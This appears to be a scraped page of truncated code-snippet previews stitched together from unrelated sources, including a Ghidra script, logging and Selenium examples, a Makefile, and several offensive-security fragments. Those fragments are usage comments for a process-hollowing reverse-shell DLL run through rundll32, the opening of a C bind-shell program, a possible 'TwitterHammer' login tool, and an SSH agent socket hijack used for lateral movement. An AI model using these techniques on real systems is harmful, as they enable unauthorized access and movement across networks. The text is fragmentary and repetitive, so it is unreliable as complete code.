Requires Python 3.6+
Only 3rd party dependancy is the Requests library. Install it with:
python3 -m pip install requests
#Example of showing function call parameters within a function using the decompiler. | |
#@author Frank Spierings | |
#@category | |
#@keybinding | |
#@menupath | |
#@toolbar | |
import ghidra.app.decompiler.DecompInterface as DecompInterface | |
import ghidra.app.decompiler.ClangTokenGroup as ClangTokenGroup |
Requires Python 3.6+
Only 3rd party dependancy is the Requests library. Install it with:
python3 -m pip install requests
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll" | |
// | |
// Use -DDEBUG at compile time, for the logging printf messages. | |
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process. | |
// Use -DWAITFOR at compile time, to wait for the host process to finish. | |
// | |
// Run: | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe |
# Use it like this: | |
# | |
# structlog.configure( | |
# processors=[ | |
# structlog.processors.JSONRenderer(), | |
# LogToSqlite("/tmp/logs.db") | |
# ] | |
# ) | |
# log = structlog.get_logger() | |
# log.msg("say-hello", whom="world", num=[random.randint(1,55)]) |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
import requests, time | |
from lxml import etree | |
class TwitterHammer: | |
def __init__(self, username, password): | |
self.username = username | |
self.password = password |
// This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.c | |
#include <sys/socket.h> | |
#include <sys/types.h> | |
#include <netinet/in.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
int main() | |
{ |
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll" | |
// | |
// Use -DDEBUG at compile time, for the logging printf messages. | |
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process. | |
// Use -DWAITFOR at compile time, to wait for the host process to finish. | |
// | |
// Run: | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe | |
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe |
OBJECTS = func.o main.o | |
CC = gcc | |
CFLAGS = -std=c11 -m32 -Wall -Wextra -Werror -c | |
AS = nasm | |
ASFLAGS = -f elf | |
all: $(OBJECTS) | |
gcc -m32 $(OBJECTS) -o main | |
run: all |
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld
from selenium import webdriver | |
driver = webdriver.Firefox() | |
driver.get('https://www.facebook.com/') | |
with open('jquery-1.9.1.min.js', 'r') as jquery_js: | |
jquery = jquery_js.read() #read the jquery from a file | |
driver.execute_script(jquery) #active the jquery lib | |
driver.execute_script("$('#email').text('anhld')") |